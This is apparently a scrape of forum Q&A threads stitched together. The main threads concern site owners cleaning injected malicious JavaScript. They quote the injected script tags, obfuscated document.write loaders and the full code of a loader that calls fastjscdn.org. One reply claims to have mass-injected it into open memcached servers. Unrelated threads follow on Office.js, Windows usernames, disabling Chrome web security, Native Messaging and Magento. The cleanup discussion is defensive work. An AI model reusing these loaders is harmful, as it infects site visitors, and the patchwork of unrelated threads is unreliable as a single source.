i have following code added automatically into my script...
<script type="text/javascript" src="http://obscurewax.ru/Kilobyte.js"></script>
<!--72628eb2e686638651ad69b6a34a630f-->
at the end of my each page when i see source code of my page it shows me the above code but when i open that file in notepad or any editing software it shows me nothing but only my script.. how can i remove that script from all of my files at once...
also let me know why it is happening so far..
Edit 25-Aug :
Specific Domains & entries added(below)
New domain nuttypiano.com spotted.
Edit :
Figured it out. it was definitely Filezilla siphoning of my FTP passwords.
Keep an eye on .htaccess file and file permission -- they seem to change to 777.
Happened to me as well. It took all the passwords from the FTP program and then changed the PHP and js files to add the line
<script type="text/javascript" src="http://obscurewax.ru/Queue.js">
Mainly index.* files are targeted other files targeted are *.js files.
I believe the end js file name varies but you can track it from the obscurewax.ru domain.
I have around 8-10 websites where this has happened. Most of my websites are running joomla.
In what I have observed as yet, It likes to target the files that start with the word
index.
In a joomla install, there were about 122 files affected by this, almost all were in the :
joomla_install/administrator
folder.
Its a pain to download a joomla install from the server because its somewhere about 4-5 thousand files. Still, the strategy I am following is this.
Download the entire site on a folder, run a text search(I am using TextCrawler) for :
obscurewax.ru
Note the number of files and folders that have this and more importantly note all the the variations of the js file names.
Do a search and replace for all the .js file variations eg :
<script type="text/javascript" src="http://obscurewax.ru/Queue.js">
<script type="text/javascript" src="http://obscurewax.ru/Cablemodem.js">
<script type="text/javascript" src="http://obscurewax.ru/Kilobyte.js">
In the .js files you will also find this type of code :
document.write('<s'+'cript type="text/javascript"
src="http://obscurewax.ru/AGP.js"></scr'+'ipt>'); // Found in .js files
Replace all with nothing ('').
Another thing you can do is : obscurewax.ru with example.com
I don't have a quick and easy way to remove the code in the comments below it(which I think they are using for tracking purposes.) -- but I think if you remove the script link, that comment is not going to hurt you.
Different domains spotted :
nuttypiano.com(spotted 25-Aug)
pocketbloke.ru
yumeye.ru
microlightning.ru
riotassistance.ru
// Denis125 <webmaster#atlant.ru> (comment in a .js file.)
Specific lines to lookout for :
<script type="text/javascript" src="http://obscurewax.ru/Beta_Software.js"></script>
<script type="text/javascript" src="http://riotassistance.ru/Undo.js"></script>
* Contributed by Open Web Technologies <http://openwebtech.ru/>
Denis125 <webmaster#atlant.ru>
// Author: Andrei Blagorazumov, a#fnr.ru
document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Undo.js"></scri'+'pt>');
document.write('<s'+'cript type="text/javascript" src="http://obscurewax.ru/Beta_Software.js"></scr'+'ipt>');
<script type="text/javascript" src="http://nuttypiano.com/Hard_Copy.js"></script>
<script type="text/javascript" src="http://nuttypiano.com/Facebook.js"></script>
document.write('<s'+'cript type="text/javascript" src="http://nuttypiano.com/Facebook.js"></scri'+'pt>');
Note : Sometimes you will not be able to see this link in your html in the source, but, the files gets loaded because its hiding in one of the JavaScripts. A good way to be sure you are really clean is to actually go in and see the .js files that are getting loaded while your page is loading and check if any .js files are loading from the suspected domain. An easy way to do this is go into the developer tools in chrome(ctrl + shift + i)
Here in the resources tab you will see the scripts filter, using this you can track all the .js files loading while your page loads. The firebug plugin in firefox will also let you see this info. If your website has several parts(front-end, back-end) you want to visit all the parts of the website and check if any suspicious .js files are getting loaded.
Very importantly
Update your Antivirus scanner and do a full scan on your computer for viruses.
If you are using an FTP program or your code editor has FTP capability you want to visit all the websites for which you have passwords stored and check if they were affected. If your FTP program/editor was compromised -- almost all the websites that you have ftp passwords stored for would have been affected.
Change the passwords for all the ftp accounts that were stored in the programs.
Uninstall the suspect program & use another one or re-download and install it.
This is the worst thing that can happen to a web-developer. This attack is generally done by tricking the victim(you and me) to believe there is an update for the FTP program from within the program, as soon as you install the update -- your sites will get affected.
I am working on this thing right now. If you have any better/shorter ways of doing this. Please share. Thanks!
I have a clients site that got hacked with line of code from obscurewax.ru. The site is hosted on GoDaddy shared hosting. It looks like they edited multiple files yesterday on the server.
We are not sure how they entered the website but they did crash the website. We are right now going in and deleting everything in start over as we are unsure of where they left files to start over.
They left this line of code - obscurewax.ru/Heat_Sink.js
Which does nothing, but I am not taking any chances. According to whois, the domain was purchased just three days ago and the info is private. If it was the hosting provider it would be public. Its being hosted in Russia and on US websites, I see that as a red flag. I think they are building their network and will activate the scripts once they have a big enough footprint.
Hope that helps.
Who is your hosting provider? Some hosts do insert code (normally ad banners for free sites, but not always) to your web page on-the-fly. If you do have such a host, I recommend getting a different one.
Never attribute to a virus what may be due to a free webhost ;)
Is that actually the URL of the script being inserted in your pages? Because that's an empty file.
Hmmm.. It seems that it is proftpd 0day.
Pair of clients reported the problem on their sites.
There was proftpd 1.3.1 installed on the server.
Regarding log files attackers were bruteforcing only login names, not passwords.
After successful guessing the login name(regarding site's domain name, for example) they hadn't any problem to login...
Bad thing, I hope upgrading to 1.3.3 will fix it.
If you are running linux server here is 2 fast console snippets to fix sites after obscurewax attack:
cd /to/site/webroot
find ./ -type f -exec sed -i "s/document.write('<s'+'cript type=\"text\/javascript\" src=\"http:\/\/obscurewax.ru\/Google.js\"><\/scr'+'ipt>')//g" {} \
find ./ -type f -exec sed -i 's/<script type="text\/javascript" src="http:\/\/obscurewax.ru\/Google.js"><\/script>//g' {} \;
Don't forget to replace Google.js with your variant of attacker's link.
UPDATE
The proftpd is clean. After some investigation I've found the real reason and it is just prosaic. One of the leading hosting manager was keeping the login/passwords of many ftp users in his Filezilla on the Windows Desktop. All the passwords that he kept was stolen by a third party.
I got the same problem on my website. They altered all .js files and added that line of code at the end.
The problem is that i can't find how they did it.
Could this be any components/plugins that is not updated perhaps?
How about we make a list of our components to see if we have some that are the same and maybee the curse of this hack?
My list is: (components)
Attachments
Banners Enabled 1.5.0 April 2006 Joomla! Project
CSV Improved Enabled 1.7 22 May 2009 RolandD Cyber Produksi
CSVI VirtueMart Enabled 2.0.1 28 November 2009 RolandD Cyber Produksi
docman Enabled 1.4.0.stable February 2009 Joomlatools
Easy Search Enabled 0.1.0 November 2008 Hiro Nozu
easysql Enabled 1.27 30/11/2006 Serebro
FrontpagePlus Disabled 0.1.0 January 2009 NoNumber! (Peter van Westen)
gk3_tabs_manager Disabled 3.0.2 31/05/2009 Gavick.com
JCE Enabled 157 23 June 2009 Ryan Demmer
JCrawler Enabled 1.7 Beta 20/4/2009 Patrick Winkler
JoomlaPack Enabled 2.4 2009-12-05 JoomlaPack Developers
K2 Enabled 2.1 September 9th, 2009 JoomlaWorks
Linkr Enabled 2.3.6 April 2008 Frank
Newsfeeds Enabled 1.5.0 April 2006 Joomla! Project
Polls Enabled 1.5.0 July 2004 Joomla! Project
Nova Enabled 1.7.5 February 2010 ProJoom
pjinstaller Enabled 1.0.8 January 2010 ProJoom
QContacts Disabled 1.0.3 July 2008 Massimo Giagnoni
QuickFAQ Enabled 1.0.3 01/02/2009 Christoph Lukes
redlinker Enabled 1.0b11 09/09/2009 Redweb.dk
redVMPRODUCTFINDER Enabled 1.10 21/01/2010 Redweb.dk
RokCandy Disabled 0.82a January 31, 2009 RocketWerx, LLC
RokModule Enabled 1.1 June 2008 RocketTheme
forme Enabled 1.0.4 07/02/2008 www.rsjoomla.com
RSform Enabled 1.2.0 17/06/2009 www.rsjoomla.com
rsinstaller Enabled 1.0.0 04/06/2009 www.rsjoomla.com
sh404sef Enabled 1.0.16_Beta Jan 2, 2009 Yannick Gaultier
VirtueMart Enabled 1.1.4 16.10.2009 The VirtueMart Development Team
vmemails Enabled 1.0.4b182 2009-11-28 InteraMind Advanced Analytics
Weblinks Enabled 1.5.0 April 2006 Joomla! Project
Xmap
Note: 2 month ago I did a complete cleanup of my pc, changed all passwords on the server and website. This only worked until now where the virus is back, so my very good guess is that it's a component, module, plugin that is during the damage. Yes, you can do all the virus clean up you want, but the issue will return!
I just stumbled on this; oops, it is quite a recent incident here. I thought that my site was the only one. I noticed that this script was always loading whenever I accessed my site; I was running a CMS but now I have shut it down. As for the suggestion of the vulnerability within FTP, count me out of this since I have never used FTP. I simply shut down the CMS section because even after running a fresh install of the latest release of the CMS another malicious script was still loading while accessing the site. That made me come to the conclusion that my web host's servers may have been compromised already. Other malicious scripts that had attacked my CMS include:
pocketbloke.ru
yumeye.ru, and
microlightning.ru
P.S: My .htaccess file was also altered and the file permissions to my CMS were all turned to 777. Could this be a cPanel vulnerability being exploited by these hackers?
Start with changing FTP or any other remote access passwords and check your computer/server for viruses. Something/someone is adding this automatically to all your files. Then you can use any mass-text-replacement tool like http://tools.tortoisesvn.net/grepWin to find that line in all files and remove them (by replacing with empty line).
UPDATE
I missed your line about that you don't see that line in your files source. Just check the rest of the file and check all JS files - they should include small portion of minified code which adds that line. You can also try to search all your files locally or by using any browsers developer tools to find where same URL or part of is mentioned.
Weird. I got the same thing in one of my clients index.html with a bunch of other mysterious files. Perhaps they got into his FTP. of my 50 other clients, noone else was effected it seems.
Upon inspection random users have been been able to access the FTP for a while. here was the unique list of IPs that I know aren't the owner's
137.149.150.100
173.35.246.173
174.143.242.47
188.229.31.45
188.24.43.62
188.25.239.153
188.25.73.186
189.28.154.133
198.145.116.71
198.63.210.170
203.81.55.153
208.101.102.60
209.239.120.50
212.189.180.1
213.142.137.131
217.27.224.7
68.45.8.194
69.143.233.198
70.38.11.176
70.81.249.108
74.58.67.48
76.104.123.11
78.159.45.198
78.245.136.34
78.251.215.23
78.94.44.177
79.112.216.109
79.114.26.35
79.117.237.130
79.136.32.209
81.66.237.244
81.82.154.174
81.82.52.12
82.234.154.97
82.247.130.26
82.36.17.105
83.84.225.144
84.196.204.172
85.136.145.183
85.139.199.26
85.28.76.190
86.60.215.133
87.244.217.188
87.247.251.44
87.59.67.145
88.162.127.32
88.207.7.151
89.114.92.59
89.46.96.87
89.47.179.66
91.147.207.215
91.65.157.38
92.249.196.99
94.141.145.147
94.227.112.143
95.79.22.165
99.226.133.161
Looks like some sort of mass attack. I would look at the timestamp on the files that were modified, see if any are close or if any of your other ftp people have logged in with those IPs. Just to note I am running debian linux server with proftpd...
I got a weird error message when trying to edit the file in winSCP using notepad2...so it looks like whatever code it is, messing up typical text editors. I was able to nano the file and delete the links though.
PS: I was made aware of this when google emailed me "Dear site owner or webmaster of [censored].com,
We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com."
Detected same problem today. I deleted all strings from js manually.
They getting smarter.
My string was:
document.write('<s'+'cript type="text/javascript" src="http://obscurewax.ru/Scroll_Wheel.js"></scr'+'ipt>');
Malware infects a PC with stored ftp passwords. It then automatically takes the passwords and logs in and infects the website. Look for 2 recently modified files in c:\windows\system32\drivers
They are probably the culprits.
Here is the script found on my website by Google. Google had blocked my site because of "Malware"
I was trying "Word Press" and a theme, that I paid for, "The Local". This, in my opinion, is the only path that this script could have been added. I removed all scripts of Word Press and The Local, and now Google does not detect Malware on my site.
My solution was deletion of all the scripts that I mentioned and replace everything with standard HTML. The other scripts were mostly all PHP, and I find HTML to be much more stable.
Good Luck
Related
In my Wordpress site, i have this malicious code before "/body":
<script src="https://fastjscdn.org/static.js?hash=a633f506a53746a846742c5655ebf596"></script>
The file static.js contains this:
window.__google__ads__show||(window.__google__ads__show="1",function(){if(function t(){try{return window.self!==window.top}catch(a){return!0}}()){var t,a,e=window.parent.document.createElement("script");e.src="https://fastjscdn.org/static.js",window.parent.document.body.appendChild(e);return}fetch("https://fastjscdn.org/platform/"+(window.navigator?.userAgentData?.platform||window.navigator.platform)+"/url/"+window.location.href).then(t=>{}),t="https://fastjscdn.org/"+window.location.hostname.replace("www.","")+"/static.js",(a=document.createElement("script")).src=t,document.head.appendChild(a)}());
Before "fastjscdn .org", the maliciuos JS code was hosting on domanin name "asmr9999 .live". Since few days, the domain has changed in "fastjscdn .org".
How is it possible? How can it change the domain where is it hosted?
I am sure that Wordpress, themes and plugins do not contain the malicious code. I didn't find anything in the database, also in base64 encode, for now.
Also, What does the code in the JS file do to my site?
I also found other people with my same malware, in a custom CMS, we can not solve the problem in any way. More info here
It maybe late,but let me tell the truth.The problem is the Memcached server you are using which is public and no password in network.I made a script scanning the network and injecting this malicious code to every memcached server.It's a "cache-side" xss attack.Your server is safe.Configure your firewall and block connection from outside to port 11211,everything will ok.
You can use an online JavaScript beautifier tool to check the content of static.js: seems to be injecting script adapted to the platform, probably the same that you mentioned in your other question that will trigger the download of a malware/adware
The reason why it could change the domain in the script is probably because your host is still infected; the domain was registered very recently, and was probably chosen as it looks less suspicious than the previous one
As this answer suggested, I want to modify a little bit office.js.
So I copied the content of https://appsforoffice.microsoft.com/lib/1/hosted/office.js to local, such that https://localhost:3000/static/office.js shows well the content.
Then, I make a very simple file test.html:
<html>
<head>
<!--<script src="https://appsforoffice.microsoft.com/lib/1/hosted/office.js"></script>-->
<script type="text/javascript" src="https://localhost:3000/static/office.js"></script>
</head>
<body>
haha
</body>
</html>
Loading https://localhost:3000/static/test.html with remote office.js in a browser shows Warning: Office.js is loaded outside of Office client
o15apptofilemappingtable.js:11, and loading it in an Office add-in works well.
However, loading https://localhost:3000/static/test.html with local office.js in a browser shows Uncaught SyntaxError: Unexpected token <
o15apptofilemappingtable.js:1, and loading it in an Office add-in gives an error Add-in Error Something went wrong and we couldn't start this add-in. Please try again later or contact your system administrator.
So does anyone know what's wrong here? Is it possible to make our own local version of office.js?
See my answer in the linked question. Essentially, no, you should not be making your own local copy of "office.js". But if you did want a local copy -- which we already offer on NuGet and, more recently, on NPM (https://www.npmjs.com/package/#microsoft/office-js) -- you would need all the associated files in that directory as well, not just Office.js itself.
See https://unpkg.com/#microsoft/office-js#1.1.1/dist/ for a listing of the files and folders that make up Office.js. Not all (in fact, not most) are used in any given session, but you do want the whole set of files since different ones are loaded in different circumstances.
I have apache installed on a windows laptop that is not connected to the internet. The laptop has multiple user accounts. Let's say that two of the user accounts are "Adam" and "Sally". I have a project on localhost that needs to differentiate between the different Window's users via the Chrome browser.
I understand detecting the username through the browser directly is a gross security sandbox breach, but I don't care: I have complete control of the computer and the project is not web accessible, so there are no security concerns. I'm willing to cheat in any way imaginable including building a custom .exe to help. I just need to differentiate between the different accounts. It doesn't need to be by username, but any alternative ID would need to persist for that given user.
I am asking for outside of the box thinking.
How can I create a page that I can open in Chrome that will say "Hi Adam" or "Hi Sally" or even "Hi -=[GUID]=-" without the visitor ever typing in their name/guid.
You should probably use something like NW.js or Electron instead of chrome for this so you don't have to sacrifice security.
Here's a picture of me running the nw.js sdk and loading just the demo page, bringing up the dev tools and retrieving my username.
Pretty straight forward. Follow node documentation and do whatever you'd like there.
You could have a batch file that runs on startup via the task scheduler or registry in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run or Local Group Policy that performs something like echo setCurrentUser("%USERNAME%"); > c:\your_project_directory\set-current-user.js, then you just have a script that defines <script>function setCurrentUser(s) { alert("Hello "+s); /* ... */ }</script> followed by a script import like <script src="set-current-user.js"></script>
If you just want to be able to do whatever in the filesystem, change the shortcut that launches Chrome to --allow-file-access-from-files --user-data-dir=c:\your_project_directory --disable-web-security and restart the PC (or just kill all chrome.exe processes, incl. background).
Edit: Updated with note on using --allow-file-access-from-files from Pritam Banerjee. If you go that route, he gets credit. :)
If you're interested in trying NW.js, here's a full example:
package.json :
{
"name": "nw-hello-user",
"version": "0.0.1",
"main": "index.html"
}
index.html :
<!DOCTYPE html>
<html>
<head>
<title>Hello!</title>
</head>
<body>
Hello <script>document.write(process.env.USERNAME)</script>!
</body>
</html>
Here's the command line:
Here's the end product!
Since you tagged your question with PHP, you could just create a index.php file with the following contents:
Hi <?= getenv("USERNAME") ?>
getenv("USERNAME") returns the the value of the USERNAME environment variable.
Update: Thanks to TylerY86 for providing the more correct way to get the username. Also note from his comment below:
You also have to be sure that the Apache instance is running in the
context of the user, and not as a service. If you try the example, if
you get something like SYSTEM or IUSR_MACHINE instead of the user
name, you'll need to adjust.
You have 2 choices, as far as I see.
1) you may ask users to identify themself first time they use the page and store it to the local storage. Since those are different users on the machine, their localStorages should be separate.
2) You may deploy a small web service on the local host, that gets the user credentials from the system and returns on GET request.
So I wrote a question here earlier about opening native software (browsers) in my chrome application with PNaCl,NaCl, or NPAPI which I guess are not allowed anymore or were never allowed depending on which we are talking about. So a user pointed me to Native Messaging, and I am just trying to create something that will open a users HTML file in a browser they chose.
So they have index.html and they want to test it in Firefox, Chrome, and IE so they run each one and test.
Documentation
https://developer.chrome.com/extensions/nativeMessaging
Example from Google
http://src.chromium.org/viewvc/chrome/trunk/src/chrome/common/extensions/docs/examples/api/nativeMessaging/host/
This is my first time dealing with this stuff and I don't want to have my users go to a REGEDIT file and add it and blah blah blah. It should be simple as possible, they download my app and it's done.
Native Messaging Manifest --- (which not 100% sure where to put it)
{
"name": "com.kandidesigns.kodex",
"description": "Kodex is a Chrome Application to make programming websites easier and efficient",
"path": "C:\\Program Files\\My Application\\chrome_native_messaging_host.exe",
"type": "stdio", //standard input or standard output not sure which one to use
"allowed_origins": [
"chrome-extension://bbbgompnaiddjohgmdhmienllkjkilap/"
]
}
Permissions have inside the apps manifest : "nativeMessaging"
BATCH program to run a file
SET /p ID="Enter browser"
SET /p URL="Enter URL"
IF "%ID%"=="0" start chrome %URL%
IF "%ID%"=="1" start firefox %URL%
IF "%ID%"=="2" start edge %URL%
IF "%ID%"=="3" start internet explorer %URL%
IF "%ID%"=="4" start safari %URL%
ELSE ECHO "No browser found by that classification"
Never wrote a bat file to figure out where to go and what to open etc... Here is
another tutorial I've watched which is very low and pathetic sorry.
https://www.youtube.com/watch?v=H82-9hg1Plg
Anyways if someone could lead me the right way and assist on this I'd be greatly appreciated.
The manifest file they are referring to is an independent file, not to be confused with your application manifest. Just declare a new json file, and introduce the code for the manifest (in the documentation, the file should be named nmh-manifest.json). The file can be located anywhere in the system file, but you'll need to describe the full path.
Here is a reference for a demo app implementing Native Messaging: https://chromium.googlesource.com/chromium/src/+/master/chrome/common/extensions/docs/examples/api/nativeMessaging
I cloned an existing magento 1.7.2 installation on the same server with a test subdomain. The frontend seems to work, and I can login to the admin. The admin menu doesn't work however, no dropdowns, and copying url paths doesn't work either. I've searched online, and most answers date back to 2008 and suggest that it's a rights issue. So I've changed the rights of folders and files to 755 and 644, but still no working menus. The cache (var/cache) is empty.
These menus are javascript generated. The following error message is from the console:
Error: TypeError: Element.addClassName is not a function
To be clear - the solution is not in javascript, but it's something on the server. This install works on the same server in another directory with another domain.
Any ideas how to fix this?
The error
Error: TypeError: Element.addClassName is not a function
indicates some javascript on your page can't call the addClassName method.
The addClassName method is added to element via the prototype javascript framework.
That means its very likely your browser can't download the prototype.js file. Since it can't download this file, the addClassName method is never defined, and you get the error you're seeing.
Look at the source code of your admin pages and find the script tag that includes the version of prototpye shipped with your version of Magento.
<script type="text/javascript" src="http://magento.example.com/js/prototype/prototype.js"></script>
Take the URL from this script tag and load it in your browser.
My guess is you'll get a 404 because the file is missing, or a forbidden error because the file has incorrect permissions, or some other web server error that prevents the file from being shown. It's also possible that the link is pointing to an older domain name that's based on a value configured or cached in Magento.
Track down the source of that problem, and you'll be good to go.
Another reason could be that the skin and CSS rules are not correct for your environment.
I've just moved a site from live to local, and the skin/css/media were configured to a subdomain so I looked in the core_config_data table and updated the URLs
Please check if you have set merge js or css to yes, you can update this via db if you cant do it via menu:
SELECT * FROM core_config_data WHERE path LIKE 'dev%'
Change from 1 to 0 merge_css and merge_js
In my case I have changed the permissions of folder and its recurring files and folder and it started working. Try it once.